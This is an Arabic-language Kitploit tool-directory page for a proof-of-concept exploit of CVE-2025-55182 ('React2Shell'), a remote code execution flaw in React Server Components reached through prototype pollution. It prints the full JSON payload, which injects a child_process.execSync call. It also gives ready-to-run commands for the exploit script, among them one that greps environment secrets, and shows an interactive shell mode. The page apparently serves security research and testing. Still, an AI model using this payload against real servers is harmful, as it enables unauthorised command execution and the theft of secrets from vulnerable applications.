Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EXPLOIT-CVE-2025-55182 — إثبات مفهوم لاستغلال CVE-2025-55182 (React2Shell)، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في مكونات خادم React عبر تلوث النموذج الأولي. يتضمن أوضاع استغلال تفاعلية وسطر الأوامر. | Kitploit
أدوات/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولات
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

إثبات مفهوم لاستغلال CVE-2025-55182 (React2Shell)، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في مكونات خادم React عبر تلوث النموذج الأولي. يتضمن أوضاع استغلال تفاعلية وسطر الأوامر.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لـ CVE-2025-55182

CVE-2025-55182 React

نظرة عامة

عرض عملي لـ CVE-2025-55182 (React2Shell) - ثغرة RCE حرجة في مكونات خادم React.

تفاصيل الثغرة

  • معرف CVE: CVE-2025-55182
  • النوع: تنفيذ تعليمات برمجية عن بُعد عبر تلوث النموذج الأولي
  • CVSS: 9.8 (حرج)
  • المتأثر: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

ناقل الهجوم

تقوم مكونات خادم React بإلغاء تسلسل FormData بطريقة غير آمنة. تؤدي حقول multipart المعدة خصيصًا إلى تلوث النموذج الأولي وتنفيذ تعليمات برمجية عشوائية عبر child_process.execSync.


الإعداد السريع

root@kitploit:~
npm install
pip3 install requests
npm run dev

يعمل التطبيق على: http://localhost:3000


الاستغلال

الاستخدام الأساسي

root@kitploit:~
python3 exploit.py -c "whoami"

أمثلة الأوامر

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

الوضع التفاعلي

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

كيف يعمل

هيكل الحمولة

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

الاختبار

الطرفية 1: تشغيل الخادم

root@kitploit:~
npm run dev

الطرفية 2: تشغيل الاستغلال

root@kitploit:~
python3 exploit.py -c "whoami"

وضع التفصيل

root@kitploit:~
python3 exploit.py -c "whoami" -v

يظهر هيكل الحمولة الكامل واستجابة الخادم


المراجع

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

بواسطة Guaxinim | أبحاث الأمن السيبراني

تنزيل الأداة